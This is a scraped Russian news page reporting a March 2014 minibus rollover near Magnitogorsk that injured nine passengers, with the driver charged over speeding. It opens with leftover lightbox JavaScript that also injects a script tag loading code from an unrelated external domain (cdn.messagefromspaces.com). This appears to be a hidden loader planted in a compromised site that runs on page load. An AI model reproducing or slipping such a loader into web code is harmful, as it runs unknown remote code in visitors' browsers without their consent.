, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Под Магнитогорском произошло серьезное ДТП с участием маршрутного такси: известно о 9 пострадавших

Обильный снегопад вкупе с лихачеством водителя маршрутного такси привели к серьезной аварии под Магнитогорском. Маршрутчик не справился с управлением на обледенелой трассе и вылетел с проезжей части. В результате машина перевернулась - пострадали девять пассажиров транспортного средства.

На место происшествия срочно прибыли две кареты скорой помощи. Медики оказали пострадавшим первую медицинскую помощь. Одну женщину, получившую в результате аварии перелом основания черепа, доставили в ближайшую больницу. Отметим, что водитель маршрутного такси не получил ни царапины.

По данным ГИБДД, авария произошла из-за превышения водителем маршрутки скоростного режима. Ранее мужчина не раз привлекался к административной ответственности за нарушения ПДД, в том числе и за езду в состоянии алкогольного опьянения. В этот раз он был трезв. Тем не менее, в отношении него было возбуждено уголовное дело. Водителю грозит 2 года тюрьмы и лишение водительских прав сроком на 3 года.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
17:20 - 19 марта 2014
|
автор: U-RSS
|
(352)
|
(0)

Комментарии (0)

Я человек
Я бот